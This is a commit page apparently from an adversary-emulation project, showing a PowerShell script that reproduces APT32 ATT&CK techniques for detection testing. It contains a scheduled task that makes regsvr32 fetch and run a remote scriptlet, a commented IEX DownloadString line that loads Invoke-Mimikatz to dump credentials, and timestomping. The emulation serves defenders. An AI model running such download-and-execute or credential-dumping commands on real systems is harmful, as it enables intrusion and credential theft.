b51284297d
Adding the following: - New DragonsTail Chain reaction that does not execute Mimikatz. - Generic .HTA file with supporting markdown file highlighting details. - Generic `Atomic.doc` with supporting markdown file highlighting embedded macro. - Guide (markdown) explaining how to zip files to simulate email borne threats. - Simple guide on how to setup a "Listener" for C2 communication in Python and Powershell. - Generate-Macro.ps1 - Builder script that will generate 8 different macro embedded XLS files to simulate macro techniques actively being used.
38 lines
1.6 KiB
PowerShell
38 lines
1.6 KiB
PowerShell
# Adversary Group: https://attack.mitre.org/wiki/Group/G0050
|
|
# xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
|
|
# Thanks to Nick Carr for his research on this group
|
|
# Sample Representation of ATT&CK Techniques used by APT32
|
|
# Tactics: Execution, Persistence, Privilege Escalation
|
|
|
|
|
|
# Tactic: Privilege Escalation / Execution
|
|
# Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
|
|
# Create Scheduled Task With RegSv32 Payload
|
|
|
|
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/6965fc15ef872281346d99d5eea952907167dec3/atomics/T1117/RegSvr32.sct scrobj.dll" /mo 30
|
|
|
|
SCHTASKS /Run /TN "Atomic Testing"
|
|
|
|
SCHTASKS /Delete /TN "Atomic Testing" /F
|
|
|
|
# Tactics: Execution
|
|
# Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
|
|
|
|
# powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/dev/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
|
|
|
|
# Tactics: Defense Evasion
|
|
# Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
|
|
# Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
|
|
|
|
$test = "Atomic Test File"
|
|
set-content -path test.txt -value $test
|
|
$file=(gi test.txt);$date='7/16/1945 5:29 am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date
|
|
|
|
# Tactics: Defense Evasion
|
|
# technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
|
|
|
|
# Deletes File, detection here would be File Modification
|
|
del test.txt
|
|
|
|
Write-Host "Done" -Fore Green
|